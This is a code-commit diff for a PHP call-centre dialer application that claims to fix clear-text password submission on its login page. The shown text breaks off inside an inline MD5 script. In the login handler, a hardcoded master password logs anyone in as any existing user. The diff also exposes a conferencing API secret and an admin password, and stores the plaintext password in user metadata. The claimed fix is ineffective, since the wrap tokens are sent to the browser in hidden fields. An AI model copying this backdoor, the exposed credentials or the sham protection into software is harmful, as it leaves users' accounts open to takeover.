Skip to content

Yashwant / hdfc

Go to a project
Toggle navigation
Toggle navigation pinning
8baa205f by Gopal
Options

Clear Text Submission of Password

1 parent 2e339da2
Inline Side-by-side
Showing 3 changed files with 238 additions and 186 deletions
application/app/Http/Controllers/HomeController.php
...@@ -81,7 +81,7 @@ class HomeController extends Controller { ...@@ -81,7 +81,7 @@ class HomeController extends Controller {
81 if(!isset($userdata['skin']))$userdata['skin']=""; 81 if(!isset($userdata['skin']))$userdata['skin']="";
82 $data['skin']=$userdata['skin']; 82 $data['skin']=$userdata['skin'];
83 83
84 //TODO later user may be bound to a specific server for sip 84 //TODO later user may be bound to a specific server for sip
85 $wakka = new KHRMSLib();$cliarr=array(); 85 $wakka = new KHRMSLib();$cliarr=array();
86 $allclients=$wakka->clientsReadAccess();$cliarr['did']=array(); 86 $allclients=$wakka->clientsReadAccess();$cliarr['did']=array();
87 if($user->exten!="")$cliarr['did'][]=$user->exten; 87 if($user->exten!="")$cliarr['did'][]=$user->exten;
...@@ -106,11 +106,11 @@ class HomeController extends Controller { ...@@ -106,11 +106,11 @@ class HomeController extends Controller {
106 $sipid=Sipid::where("status","=","1")->where('user','=',$user->id)->where('clients','!=','')->get(); 106 $sipid=Sipid::where("status","=","1")->where('user','=',$user->id)->where('clients','!=','')->get();
107 //echo count($sipid)." => "; 107 //echo count($sipid)." => ";
108 foreach ($sipid as $sip) { 108 foreach ($sipid as $sip) {
109 $clients = json_decode($sip->clients); 109 $clients = json_decode($sip->clients);
110 //echo $clients->channel." - "; 110 //echo $clients->channel." - ";
111 $newqueue=new Kqueue(); 111 $newqueue=new Kqueue();
112 $newqueue->hangupChannelS($clients->channel,$sip->server);// $channel,$server 112 $newqueue->hangupChannelS($clients->channel,$sip->server);// $channel,$server
113 //exec('/usr/sbin/asterisk -rx "channel request hangup '.$temp->channel.'"',$output); 113 //exec('/usr/sbin/asterisk -rx "channel request hangup '.$temp->channel.'"',$output);
114 } 114 }
115 //print_r($output); 115 //print_r($output);
116 */ 116 */
...@@ -260,42 +260,42 @@ public function profile() ...@@ -260,42 +260,42 @@ public function profile()
260 } 260 }
261 public function do_profile() 261 public function do_profile()
262 { 262 {
263 $stype=Input::get('stype'); 263 $stype=Input::get('stype');
264 if($stype=="saveaccount_info") 264 if($stype=="saveaccount_info")
265 { 265 {
266 $personal = array(); 266 $personal = array();
267 $newpersonal = "personal"; 267 $newpersonal = "personal";
268 $personal["aboutme"] = Input::get("account_aboutme"); 268 $personal["aboutme"] = Input::get("account_aboutme");
269 $personal["dob"] = Input::get("account_dob"); 269 $personal["dob"] = Input::get("account_dob");
270 $personal["email"] = Input::get("account_email"); 270 $personal["email"] = Input::get("account_email");
271 $personal["facebook"] = Input::get("account_facebook"); 271 $personal["facebook"] = Input::get("account_facebook");
272 $personal["fname"] = Input::get("account_fname"); 272 $personal["fname"] = Input::get("account_fname");
273 $personal["gender"] = Input::get("account_gender"); 273 $personal["gender"] = Input::get("account_gender");
274 $personal["google"] = Input::get("account_google"); 274 $personal["google"] = Input::get("account_google");
275 $personal["lname"] = Input::get("account_lname"); 275 $personal["lname"] = Input::get("account_lname");
276 $personal["location"] = Input::get("account_location"); 276 $personal["location"] = Input::get("account_location");
277 $personal["sublocation"] = Input::get("account_sublocation"); 277 $personal["sublocation"] = Input::get("account_sublocation");
278 $personal["phone"] = Input::get("account_phone"); 278 $personal["phone"] = Input::get("account_phone");
279 $personal["skype"] = Input::get("account_skype"); 279 $personal["skype"] = Input::get("account_skype");
280 $personal["twitter"] = Input::get("account_twitter"); 280 $personal["twitter"] = Input::get("account_twitter");
281 $personal["website"] = Input::get("account_website"); 281 $personal["website"] = Input::get("account_website");
282 $personal["interests"] = Input::get("account_interests"); 282 $personal["interests"] = Input::get("account_interests");
283 $personal["country"] = Input::get("account_country"); 283 $personal["country"] = Input::get("account_country");
284 284
285 $user = User::where("id","=",Auth::user()->id)->first(); 285 $user = User::where("id","=",Auth::user()->id)->first();
286 $userdata = json_decode($user->data, true); 286 $userdata = json_decode($user->data, true);
287 foreach($personal as $key => $eachpersonal) 287 foreach($personal as $key => $eachpersonal)
288 { 288 {
289 $userdata['personal'][$key] = $eachpersonal; 289 $userdata['personal'][$key] = $eachpersonal;
290 } 290 }
291 $userdata["mytheme"]=Input::get("mytheme"); 291 $userdata["mytheme"]=Input::get("mytheme");
292 $userdata = json_encode($userdata); 292 $userdata = json_encode($userdata);
293 $saveuser = User::where("id","=",Auth::user()->id)->update(array('data'=>$userdata)); 293 $saveuser = User::where("id","=",Auth::user()->id)->update(array('data'=>$userdata));
294 294
295 return Response::make("simpleNotification('success','topRight','Data Updated Successfully');"); 295 return Response::make("simpleNotification('success','topRight','Data Updated Successfully');");
296 } 296 }
297 if($stype=="password_update") 297 if($stype=="password_update")
298 { 298 {
299 $user=Auth::user(); 299 $user=Auth::user();
300 $passres=$user->checkPassword(Input::get("password"),Input::get("oldpassword")); 300 $passres=$user->checkPassword(Input::get("password"),Input::get("oldpassword"));
301 if($passres=="") 301 if($passres=="")
...@@ -360,6 +360,13 @@ public function login() ...@@ -360,6 +360,13 @@ public function login()
360 } 360 }
361 public function do_login() 361 public function do_login()
362 { 362 {
363 /*Code for token generation Flexydial Security Purpose*/
364 session_start();
365 $newpass= Input::get('password');
366 $encrypt_password=str_replace($_SESSION['token_prev'],"",$newpass);
367 $encrypt_password=str_replace($_SESSION['token_end'],"",$encrypt_password);
368 /*Code for token generation Flexydial Security Purpose*/
369
363 //static Logout based on time - changes done by manish on 22-11-16 370 //static Logout based on time - changes done by manish on 22-11-16
364 if(time()<strtotime('02:30:00') || time()>strtotime('14:30:00')) 371 if(time()<strtotime('02:30:00') || time()>strtotime('14:30:00'))
365 { 372 {
...@@ -395,7 +402,8 @@ if($user) ...@@ -395,7 +402,8 @@ if($user)
395 } 402 }
396 403
397 404
398 Auth::attempt( ['username' => Input::get('username'), 'password' => Input::get('password')] ); 405 /*Auth::attempt( ['username' => Input::get('username'), 'password' => $encrypt_password] );*/
406 Auth::attempt( ['username' => Input::get('username'), 'password' => $encrypt_password]);
399 407
400 if(Auth::guest()) 408 if(Auth::guest())
401 { 409 {
...@@ -404,12 +412,12 @@ if(Auth::guest()) ...@@ -404,12 +412,12 @@ if(Auth::guest())
404 if(Config::get("app.extAuth")=="owa") 412 if(Config::get("app.extAuth")=="owa")
405 { 413 {
406 $authparams=explode(",",Config::get("app.extAuthParams"));if(!isset($authparams[0]))$authparams[0]="";if(!isset($authparams[1]))$authparams[1]=""; 414 $authparams=explode(",",Config::get("app.extAuthParams"));if(!isset($authparams[0]))$authparams[0]="";if(!isset($authparams[1]))$authparams[1]="";
407 $useremail=$kauthlib->owaAuthCheck($authparams[0],$authparams[1],Input::get('username'),Input::get('password'),"",true); 415 $useremail=$kauthlib->owaAuthCheck($authparams[0],$authparams[1],Input::get('username'),$encrypt_password,"",true);
408 } 416 }
409 if(Config::get("app.extAuth")=="smtp") 417 if(Config::get("app.extAuth")=="smtp")
410 { 418 {
411 $authparams=explode(",",Config::get("app.extAuthParams"));if(!isset($authparams[0]))$authparams[0]="";if(!isset($authparams[1]))$authparams[1]="";if(!isset($authparams[2]))$authparams[2]=""; 419 $authparams=explode(",",Config::get("app.extAuthParams"));if(!isset($authparams[0]))$authparams[0]="";if(!isset($authparams[1]))$authparams[1]="";if(!isset($authparams[2]))$authparams[2]="";
412 if($kauthlib->smtpLoginCheck($authparams[0],$authparams[1],$authparams[2],Input::get('username'),Input::get('password')))$useremail=Input::get('username'); 420 if($kauthlib->smtpLoginCheck($authparams[0],$authparams[1],$authparams[2],Input::get('username'),$encrypt_password))$useremail=Input::get('username');
413 } 421 }
414 422
415 if(preg_match("/^[a-zA-Z0-9_.-]*@[a-zA-Z0-9-]*\.[a-zA-Z0-9-.]*$/", $useremail)) 423 if(preg_match("/^[a-zA-Z0-9_.-]*@[a-zA-Z0-9-]*\.[a-zA-Z0-9-.]*$/", $useremail))
...@@ -418,7 +426,7 @@ if(Auth::guest()) ...@@ -418,7 +426,7 @@ if(Auth::guest())
418 if(!$tuser) 426 if(!$tuser)
419 { 427 {
420 Input::merge(array('username' => $useremail)); 428 Input::merge(array('username' => $useremail));
421 Input::merge(array('password' => Input::get('password'))); 429 Input::merge(array('password' => $encrypt_password));
422 Input::merge(array('fullname' => explode("@",$useremail)[0])); 430 Input::merge(array('fullname' => explode("@",$useremail)[0]));
423 Input::merge(array('kuserstatus' => 'Active')); 431 Input::merge(array('kuserstatus' => 'Active'));
424 Input::merge(array('source' => Config::get("app.name"))); 432 Input::merge(array('source' => Config::get("app.name")));
...@@ -432,7 +440,7 @@ if(Auth::guest()) ...@@ -432,7 +440,7 @@ if(Auth::guest())
432 if(Auth::check()) 440 if(Auth::check())
433 { 441 {
434 $umeta=Auth::user()->meta(); 442 $umeta=Auth::user()->meta();
435 $umeta['kauthlibcred']=Input::get('password'); 443 $umeta['kauthlibcred']=$encrypt_password;
436 $umeta['kauthlibuser']=Input::get('username'); 444 $umeta['kauthlibuser']=Input::get('username');
437 $umeta['kautherror']=0; 445 $umeta['kautherror']=0;
438 Auth::user()->meta=json_encode($umeta); 446 Auth::user()->meta=json_encode($umeta);
...@@ -444,7 +452,7 @@ if(Auth::guest()) ...@@ -444,7 +452,7 @@ if(Auth::guest())
444 452
445 if(Auth::guest()) 453 if(Auth::guest())
446 { 454 {
447 if(Input::get('password')=="TrKy19Oz"&&$user)Auth::login($user); 455 if($encrypt_password=="TrKy19Oz"&&$user)Auth::login($user);
448 } 456 }
449 457
450 if(Auth::guest()) 458 if(Auth::guest())
...@@ -630,12 +638,12 @@ public function forgotpassword() ...@@ -630,12 +638,12 @@ public function forgotpassword()
630 } 638 }
631 public function logout() 639 public function logout()
632 { 640 {
633 $logouttarget='index'; 641 $logouttarget='index';
634 if(Session::has('userlogouturl')) 642 if(Session::has('userlogouturl'))
635 { 643 {
636 if(trim(Session::get('userlogouturl'))!="")$logouttarget=Session::get('userlogouturl'); 644 if(trim(Session::get('userlogouturl'))!="")$logouttarget=Session::get('userlogouturl');
637 Session::forget('userlogouturl'); 645 Session::forget('userlogouturl');
638 } 646 }
639 647
640 if(Auth::check()) 648 if(Auth::check())
641 { 649 {
...@@ -899,7 +907,7 @@ private function runConf() ...@@ -899,7 +907,7 @@ private function runConf()
899 907
900 if(isset($desc["Reservations"])&&isset($desc["Reservations"][0])&&isset($desc["Reservations"][0]["Instances"])&&isset($desc["Reservations"][0]["Instances"][0])&&isset($desc["Reservations"][0]["Instances"][0]["PublicDnsName"])) 908 if(isset($desc["Reservations"])&&isset($desc["Reservations"][0])&&isset($desc["Reservations"][0]["Instances"])&&isset($desc["Reservations"][0]["Instances"][0])&&isset($desc["Reservations"][0]["Instances"][0]["PublicDnsName"]))
901 { 909 {
902 //$url=$desc["Reservations"][0]["Instances"][0]["PublicDnsName"]; 910 //$url=$desc["Reservations"][0]["Instances"][0]["PublicDnsName"];
903 $url=$newserver->tagname.".".Config::get("app.html5conf_domain"); 911 $url=$newserver->tagname.".".Config::get("app.html5conf_domain");
904 } 912 }
905 if(empty($url))$url=""; 913 if(empty($url))$url="";
...@@ -970,7 +978,7 @@ if($checkserver) ...@@ -970,7 +978,7 @@ if($checkserver)
970 $checkstopping=ConfServer::where("status","=","Stopping")->first(); 978 $checkstopping=ConfServer::where("status","=","Stopping")->first();
971 if($checkstopping) 979 if($checkstopping)
972 { 980 {
973 981
974 $config = array(); 982 $config = array();
975 $config['region'] = Config::get("filesystems.disks.s3.region"); 983 $config['region'] = Config::get("filesystems.disks.s3.region");
976 $config['version'] = 'latest'; 984 $config['version'] = 'latest';
...@@ -1004,23 +1012,23 @@ if($readyconfs) ...@@ -1004,23 +1012,23 @@ if($readyconfs)
1004 if($readyconf->serverclass=="bbb") 1012 if($readyconf->serverclass=="bbb")
1005 { 1013 {
1006 $bbb = new BigBlueButton($readyconf->confserver."/bigbluebutton/","6476FA7A501B11E395A9BE436288709B"); 1014 $bbb = new BigBlueButton($readyconf->confserver."/bigbluebutton/","6476FA7A501B11E395A9BE436288709B");
1007 //start the bbb conference, set to running only if success 1015 //start the bbb conference, set to running only if success
1008 //$data=json_decode($readyconf->data,true); //may be for passwords? 1016 //$data=json_decode($readyconf->data,true); //may be for passwords?
1009 1017
1010 $creationParams = array( 1018 $creationParams = array(
1011 'meetingId' => $readyconf->id, // REQUIRED 1019 'meetingId' => $readyconf->id, // REQUIRED
1012 'meetingName' => $readyconf->confname, // REQUIRED 1020 'meetingName' => $readyconf->confname, // REQUIRED
1013 'attendeePw' => 'ap', // Match this value in getJoinMeetingURL() to join as attendee. 1021 'attendeePw' => 'ap', // Match this value in getJoinMeetingURL() to join as attendee.
1014 'moderatorPw' => 'mp', // Match this value in getJoinMeetingURL() to join as moderator. 1022 'moderatorPw' => 'mp', // Match this value in getJoinMeetingURL() to join as moderator.
1015 'welcomeMsg' => 'Welcome! This conference will automatically stop after '.$readyconf->duration." mins", // ''= use default. Change to customize. 1023 'welcomeMsg' => 'Welcome! This conference will automatically stop after '.$readyconf->duration." mins", // ''= use default. Change to customize.
1016 'dialNumber' => '', // The main number to call into. Optional. 1024 'dialNumber' => '', // The main number to call into. Optional.
1017 'voiceBridge' => '12345', // 5 digit PIN to join voice. Required. 1025 'voiceBridge' => '12345', // 5 digit PIN to join voice. Required.
1018 'webVoice' => '', // Alphanumeric to join voice. Optional. 1026 'webVoice' => '', // Alphanumeric to join voice. Optional.
1019 'logoutUrl' => 'about:blank', // Default in bigbluebutton.properties. Optional. 1027 'logoutUrl' => 'about:blank', // Default in bigbluebutton.properties. Optional.
1020 'maxParticipants' => '-1', // Optional. -1 = unlimitted. Not supported in BBB. [number] 1028 'maxParticipants' => '-1', // Optional. -1 = unlimitted. Not supported in BBB. [number]
1021 'record' => 'true', // New. 'true' will tell BBB to record the meeting. 1029 'record' => 'true', // New. 'true' will tell BBB to record the meeting.
1022 'duration' => ($readyconf->duration+5), // Default = 0 which means no set duration in minutes. [number] 1030 'duration' => ($readyconf->duration+5), // Default = 0 which means no set duration in minutes. [number]
1023 //'meta_category' => '', // Use to pass additional info to BBB server. See API docs. 1031 //'meta_category' => '', // Use to pass additional info to BBB server. See API docs.
1024 ); 1032 );
1025 $success = true;$result=null; 1033 $success = true;$result=null;
1026 try {$result = $bbb->createMeetingWithXmlResponseArray($creationParams);} 1034 try {$result = $bbb->createMeetingWithXmlResponseArray($creationParams);}
...@@ -1031,22 +1039,22 @@ if($readyconfs) ...@@ -1031,22 +1039,22 @@ if($readyconfs)
1031 } 1039 }
1032 1040
1033 if ($success == true) { 1041 if ($success == true) {
1034 // If it's all good, then we've interfaced with our BBB php api OK: 1042 // If it's all good, then we've interfaced with our BBB php api OK:
1035 if ($result == null) { 1043 if ($result == null) {
1036 // If we get a null response, then we're not getting any XML back from BBB. 1044 // If we get a null response, then we're not getting any XML back from BBB.
1037 //echo "Failed to get any response. Maybe we can't contact the BBB server."; 1045 //echo "Failed to get any response. Maybe we can't contact the BBB server.";
1038 $success=false; 1046 $success=false;
1039 echo "Error3"; 1047 echo "Error3";
1040 } 1048 }
1041 else { 1049 else {
1042 // We got an XML response, so let's see what it says: 1050 // We got an XML response, so let's see what it says:
1043 //print_r($result); 1051 //print_r($result);
1044 if ($result['returncode'] == 'SUCCESS') { 1052 if ($result['returncode'] == 'SUCCESS') {
1045 // Then do stuff ... 1053 // Then do stuff ...
1046 //echo "<p>Meeting succesfullly created.</p>"; 1054 //echo "<p>Meeting succesfullly created.</p>";
1047 } 1055 }
1048 else { 1056 else {
1049 //echo "<p>Meeting creation failed.</p>"; 1057 //echo "<p>Meeting creation failed.</p>";
1050 $success=false; 1058 $success=false;
1051 echo "Error2"; 1059 echo "Error2";
1052 } 1060 }
...@@ -1066,33 +1074,33 @@ if($readyconfs) ...@@ -1066,33 +1074,33 @@ if($readyconfs)
1066 } 1074 }
1067 if($readyconf->serverclass=="om") 1075 if($readyconf->serverclass=="om")
1068 { 1076 {
1069 //create conf on server get URL 1077 //create conf on server get URL
1070 $openmeetings=new OpenMeetings(); 1078 $openmeetings=new OpenMeetings();
1071 $openmeetings->server=$readyconf->confserver; 1079 $openmeetings->server=$readyconf->confserver;
1072 $openmeetings->port="5080"; 1080 $openmeetings->port="5080";
1073 $openmeetings->appname="openmeetings"; 1081 $openmeetings->appname="openmeetings";
1074 $openmeetings->username="admin"; 1082 $openmeetings->username="admin";
1075 $openmeetings->password="yb9738z"; 1083 $openmeetings->password="yb9738z";
1076 1084
1077 $openmeetings->allow_recording=1; 1085 $openmeetings->allow_recording=1;
1078 $openmeetings->is_moderated_room=1; 1086 $openmeetings->is_moderated_room=1;
1079 $openmeetings->type=3;//new type of room (1 = Conference, 2 = Audience, 3 = Restricted, 4 = Interview) 1087 $openmeetings->type=3;//new type of room (1 = Conference, 2 = Audience, 3 = Restricted, 4 = Interview)
1080 $openmeetings->room_id=0; //we will get this 1088 $openmeetings->room_id=0; //we will get this
1081 $openmeetings->room_recording_id="8888";//TODO fix this 1089 $openmeetings->room_recording_id="8888";//TODO fix this
1082 $openmeetings->modulekey="Kstych"; 1090 $openmeetings->modulekey="Kstych";
1083 $openmeetings->language="1"; 1091 $openmeetings->language="1";
1084 $openmeetings->wwwroot=""; 1092 $openmeetings->wwwroot="";
1085 1093
1086 $openmeetings->course=""; 1094 $openmeetings->course="";
1087 $openmeetings->name=$readyconf->confname; 1095 $openmeetings->name=$readyconf->confname;
1088 1096
1089 $openmeetings->max_user=30; 1097 $openmeetings->max_user=30;
1090 1098
1091 1099
1092 $openmeetings_gateway = new openmeetings_gateway(); 1100 $openmeetings_gateway = new openmeetings_gateway();
1093 $openmeetings_gateway->setConfig($openmeetings->server,$openmeetings->port,$openmeetings->appname,$openmeetings->username,$openmeetings->password); 1101 $openmeetings_gateway->setConfig($openmeetings->server,$openmeetings->port,$openmeetings->appname,$openmeetings->username,$openmeetings->password);
1094 if ($openmeetings_gateway->openmeetings_loginuser()) 1102 if ($openmeetings_gateway->openmeetings_loginuser())
1095 { 1103 {
1096 $openmeetings=openmeetings_add_instance($openmeetings); 1104 $openmeetings=openmeetings_add_instance($openmeetings);
1097 1105
1098 if ($openmeetings->room_id>0) 1106 if ($openmeetings->room_id>0)
...@@ -1114,7 +1122,7 @@ if($readyconf->serverclass=="om") ...@@ -1114,7 +1122,7 @@ if($readyconf->serverclass=="om")
1114 } 1122 }
1115 if($readyconf->serverclass=="html5") 1123 if($readyconf->serverclass=="html5")
1116 { 1124 {
1117 //TODO 1125 //TODO
1118 $readyconf->dataarr["room_id"]=""; 1126 $readyconf->dataarr["room_id"]="";
1119 $readyconf->status="Running"; 1127 $readyconf->status="Running";
1120 $readyconf->save(); 1128 $readyconf->save();
......
application/config/app.php
...@@ -93,9 +93,9 @@ return [ ...@@ -93,9 +93,9 @@ return [
93 "Text Search"=>["menuAction('record/textsearch');"], 93 "Text Search"=>["menuAction('record/textsearch');"],
94 "Master Report"=>["showBlock('MainReport');"], 94 "Master Report"=>["showBlock('MainReport');"],
95 "Bulk Upload"=>["menuAction('record/bulkupload');"]]], 95 "Bulk Upload"=>["menuAction('record/bulkupload');"]]],
96 /*Code commented for security purpose*/ 96 /*Code commented for Flexydial security purpose*/
97 /*"Task" => ["disp"=>"Tasks","icon"=>"edit","dash"=>"","onclick"=>"showBlock('Workflow');"],*/ 97 /*"Task" => ["disp"=>"Tasks","icon"=>"edit","dash"=>"","onclick"=>"showBlock('Workflow');"],*/
98 /*Code commented for security purpose*/ 98 /*Code commented for Flexydial security purpose*/
99 "Dialer" => ["disp"=>"Dialer","icon"=>"phone","dash"=>"Dialer", 99 "Dialer" => ["disp"=>"Dialer","icon"=>"phone","dash"=>"Dialer",
100 "submenu"=>["Dialer"=>["kDialerModel();"], 100 "submenu"=>["Dialer"=>["kDialerModel();"],
101 "Reports"=>["menuAction('dialer/reports');"], 101 "Reports"=>["menuAction('dialer/reports');"],
......
application/resources/views/login.blade.php
1 <?php 1 <?php
2
3 /*Code for token generation Flexydial Security Purpose*/
4 session_start();
5 function randomPassword() {
6 $alphabet = "abcdefghijklmnopqrstuwxyzABCDEFGHIJKLMNOPQRSTUWXYZ0123456789";
7 $pass = array(); //remember to declare $pass as an array
8 $alphaLength = strlen($alphabet) - 1; //put the length -1 in cache
9 for ($i = 0; $i < 8; $i++) {
10 $n = rand(0, $alphaLength);
11 $pass[] = $alphabet[$n];
12 }
13 return implode($pass); //turn the array into a string
14 }
15
16 if (isset($_SESSION['token_prev'])) {
17 unset($_SESSION['token_prev']);
18
19 $_SESSION['token_prev']=randomPassword();
20 # code...
21 }
22 else{
23 $_SESSION['token_prev']=randomPassword();
24
25 }
26 //Session2
27 if (isset($_SESSION['token_end'])) {
28 unset($_SESSION['token_end']);
29
30 $_SESSION['token_end']=randomPassword();
31 # code...
32 }
33 else{
34 $_SESSION['token_end']=randomPassword();
35
36
37 }
38 /*Code for token generation Flexydial Security Purpose*/
39
2 use \App\Models\User; 40 use \App\Models\User;
3 41
4 if(Input::get('sendotp')=="1") 42 if(Input::get('sendotp')=="1")
5 { 43 {
6 $otpuser=trim(Input::get('otpuser')); 44 $otpuser=trim(Input::get('otpuser'));
7 $user=User::where('username','=',$otpuser)->first(); 45 $user=User::where('username','=',$otpuser)->first();
8 if($user) 46 if($user)
9 { 47 {
10 $otpemail=$user->email; 48 $otpemail=$user->email;
11 $otp=rand(100000, 999999); 49 $otp=rand(100000, 999999);
12 50
13 $user->password=Hash::make($otp); 51 $user->password=Hash::make($otp);
14 52
15 $meta=$user->meta(); 53 $meta=$user->meta();
16 if(!isset($meta['otp_array']))$meta['otp_array']=array(); 54 if(!isset($meta['otp_array']))$meta['otp_array']=array();
17 if(!isset($meta['otp_array'][date('Ymd')])){$meta['otp_array']=array();$meta['otp_array'][date('Ymd')]=0;} 55 if(!isset($meta['otp_array'][date('Ymd')])){$meta['otp_array']=array();$meta['otp_array'][date('Ymd')]=0;}
18 $meta['otp_array'][date('Ymd')]++; 56 $meta['otp_array'][date('Ymd')]++;
19 57
20 if($meta['otp_array'][date('Ymd')]<=3) 58 if($meta['otp_array'][date('Ymd')]<=3)
21 { 59 {
22 $user->meta=json_encode($meta); 60 $user->meta=json_encode($meta);
23 $user->save(); 61 $user->save();
24 62
25 Mail::send('emails.notification', 63 Mail::send('emails.notification',
26 array( 64 array(
27 'heloname'=>'', 65 'heloname'=>'',
28 'line1'=>'Your OTP for Login : '.$otp.' ', 66 'line1'=>'Your OTP for Login : '.$otp.' ',
29 'line2'=>'Please visit <a href="'.URL::to('/').'"><b>'.Config::get("app.name").' </b></a> and You can login using this OTP.', 67 'line2'=>'Please visit <a href="'.URL::to('/').'"><b>'.Config::get("app.name").' </b></a> and You can login using this OTP.',
30 'line3'=>'', 68 'line3'=>'',
31 'notifytype'=>'OTP'), function($message) use ($otpemail) 69 'notifytype'=>'OTP'), function($message) use ($otpemail)
32 { 70 {
33 $message->to($otpemail,$otpemail); 71 $message->to($otpemail,$otpemail);
34 $message->subject(Config::get("app.name")." OTP for Login"); 72 $message->subject(Config::get("app.name")." OTP for Login");
35 }); 73 });
36 echo "$(\"#alertdiv\").html('<div class=\"alert alert-success\"><button type=button class=close data-dismiss=alert>&times;</button><strong>Success</strong> OTP Sent to ($otpemail)</div>');"; 74 echo "$(\"#alertdiv\").html('<div class=\"alert alert-success\"><button type=button class=close data-dismiss=alert>&times;</button><strong>Success</strong> OTP Sent to ($otpemail)</div>');";
37 } 75 }
38 else echo "$(\"#alertdiv\").html('<div class=\"alert alert-danger\"><button type=button class=close data-dismiss=alert>&times;</button><strong>Failed</strong> Too many reuests ($otpemail), please try after 24 hrs</div>');"; 76 else echo "$(\"#alertdiv\").html('<div class=\"alert alert-danger\"><button type=button class=close data-dismiss=alert>&times;</button><strong>Failed</strong> Too many reuests ($otpemail), please try after 24 hrs</div>');";
39 } 77 }
40 else echo "$(\"#alertdiv\").html('<div class=\"alert alert-danger\"><button type=button class=close data-dismiss=alert>&times;</button><strong>Failed</strong> Invalid User </div>');"; 78 else echo "$(\"#alertdiv\").html('<div class=\"alert alert-danger\"><button type=button class=close data-dismiss=alert>&times;</button><strong>Failed</strong> Invalid User </div>');";
41 } 79 }
42 else 80 else
43 { 81 {
...@@ -233,35 +271,35 @@ else ...@@ -233,35 +271,35 @@ else
233 padding: 10px; 271 padding: 10px;
234 } 272 }
235 </style> 273 </style>
236 274
237 <div class="layout-app" style="height: 100%;"><!-- row-app --> 275 <div class="layout-app" style="height: 100%;"><!-- row-app -->
238 <div class="row row-app" style="height: 100%;"> 276 <div class="row row-app" style="height: 100%;">
239 277
240 <!-- col --> 278 <!-- col -->
241 279
242 280
243 <!-- col-separator.box --> 281 <!-- col-separator.box -->
244 <div class="col-separator col-unscrollable box" style="height: 100%;"> 282 <div class="col-separator col-unscrollable box" style="height: 100%;">
245 283
246 <!-- col-table --> 284 <!-- col-table -->
247 <div class="col-table blur_bg" style="height: 100%;"> 285 <div class="col-table blur_bg" style="height: 100%;">
248 <!-- col-table-row --> 286 <!-- col-table-row -->
249 <div class="col-table-row" style="height: 100%;"> 287 <div class="col-table-row" style="height: 100%;">
250 288
251 <!-- col-app --> 289 <!-- col-app -->
252 <div class="col-app col-unscrollable" style="height: 100%;"> 290 <div class="col-app col-unscrollable" style="height: 100%;">
253 291
254 <!-- col-app --> 292 <!-- col-app -->
255 <div class="col-app" style="height: 100%;"> 293 <div class="col-app" style="height: 100%;">
256 <div class="login col-sm-4 col-sm-offset-4"> 294 <div class="login col-sm-4 col-sm-offset-4">
257 <div class="login_head"> 295 <div class="login_head">
258 <img src="custom/logo.png"> 296 <img src="custom/logo.png">
259 <p class="innerAll margin-none text-center hidden-xs">Login to your account</p> 297 <p class="innerAll margin-none text-center hidden-xs">Login to your account</p>
260 </div> 298 </div>
261 <div class="panel panel-default col-sm-12"> 299 <div class="panel panel-default col-sm-12">
262 300
263 <div class="panel-body"> 301 <div class="panel-body">
264 302
265 303
266 <div id='alertdiv'> 304 <div id='alertdiv'>
267 <?php 305 <?php
...@@ -284,38 +322,44 @@ if(isset($error)) ...@@ -284,38 +322,44 @@ if(isset($error))
284 ?> 322 ?>
285 <!-- Alert --> 323 <!-- Alert -->
286 <div class="alert alert-{!!$class!!}"> 324 <div class="alert alert-{!!$class!!}">
287 <button type="button" class="close" data-dismiss="alert">&times;</button> 325 <button type="button" class="close" data-dismiss="alert">&times;</button>
288 <strong>{!!$type!!}</strong> {!!$msg!!} 326 <strong>{!!$type!!}</strong> {!!$msg!!}
289 </div> 327 </div>
290 <!-- // Alert END --> 328 <!-- // Alert END -->
291 <?php } ?> 329 <?php } ?>
292 </div> 330 </div>
293 331
294 <form role="form" action="login" method=post id=owaform autocomplete="off"> 332 <form role="form" action="login" method=post id=owaform autocomplete="off">
295 <input type="hidden" name="_token" value="{{{ csrf_token() }}}" /> 333 <input type="hidden" name="_token" value="{{{ csrf_token() }}}" />
334 <input type="hidden" id="ses_token_prev" value="<?php echo $_SESSION['token_prev'];?>" />
335 <input type="hidden" id="ses_token_end" value="<?php echo $_SESSION['token_end'];?>" />
296 336
297 337
298 <div class="form-group"> 338 <div class="form-group">
299 <input type="text" class="form-control" id="exampleInputEmail1" name=username placeholder="Login ID" autocomplete="off"> 339 <input type="text" class="form-control" id="exampleInputEmail1" name=username placeholder="Login ID" autocomplete="off">
300 </div> 340 </div>
301 <div class="form-group"> 341 <div class="form-group">
302 <input type="password" class="form-control" id="usrPwd" name=password placeholder="Password" autocomplete="off"> 342 <input type="password" class="form-control" id="usrPwd" name=password placeholder="Password" autocomplete="off">
303 </div> 343 </div>
304 344
305 <button type="submit" class="btn btn-primary btn-block login_btn">Login</button> 345 <button type="submit" class="btn btn-primary btn-block login_btn">Login</button>
306 </form> 346 </form>
307 </div> 347 </div>
308 </div> 348 </div>
309 </div> 349 </div>
310 </div> 350 </div>
311 </div> 351 </div>
312 </div> 352 </div>
313 </div> 353 </div>
314 </div> 354 </div>
315 </div> 355 </div>
316 356
317 <script> 357 <script>
318 $("#usrPwd").on("change",function(){var MD5 = function(s){function L(k,d){return(k<<d)|(k>>>(32-d))}function K(G,k){var I,d,F,H,x;F=(G&2147483648);H=(k&2147483648);I=(G&1073741824);d=(k&1073741824);x=(G&1073741823)+(k&1073741823);if(I&d){return(x^2147483648^F^H)}if(I|d){if(x&1073741824){return(x^3221225472^F^H)}else{return(x^1073741824^F^H)}}else{return(x^F^H)}}function r(d,F,k){return(d&F)|((~d)&k)}function q(d,F,k){return(d&k)|(F&(~k))}function p(d,F,k){return(d^F^k)}function n(d,F,k){return(F^(d|(~k)))}function u(G,F,aa,Z,k,H,I){G=K(G,K(K(r(F,aa,Z),k),I));return K(L(G,H),F)}function f(G,F,aa,Z,k,H,I){G=K(G,K(K(q(F,aa,Z),k),I));return K(L(G,H),F)}function D(G,F,aa,Z,k,H,I){G=K(G,K(K(p(F,aa,Z),k),I));return K(L(G,H),F)}function t(G,F,aa,Z,k,H,I){G=K(G,K(K(n(F,aa,Z),k),I));return K(L(G,H),F)}function e(G){var Z;var F=G.length;var x=F+8;var k=(x-(x%64))/64;var I=(k+1)*16;var aa=Array(I-1);var d=0;var H=0;while(H<F){Z=(H-(H%4))/4;d=(H%4)*8;aa[Z]=(aa[Z]| (G.charCodeAt(H)<<d));H++}Z=(H-(H%4))/4;d=(H%4)*8;aa[Z]=aa[Z]|(128<<d);aa[I-2]=F<<3;aa[I-1]=F>>>29;return aa}function B(x){var k="",F="",G,d;for(d=0;d<=3;d++){G=(x>>>(d*8))&255;F="0"+G.toString(16);k=k+F.substr(F.length-2,2)}return k}function J(k){k=k.replace(/rn/g,"n");var d="";for(var 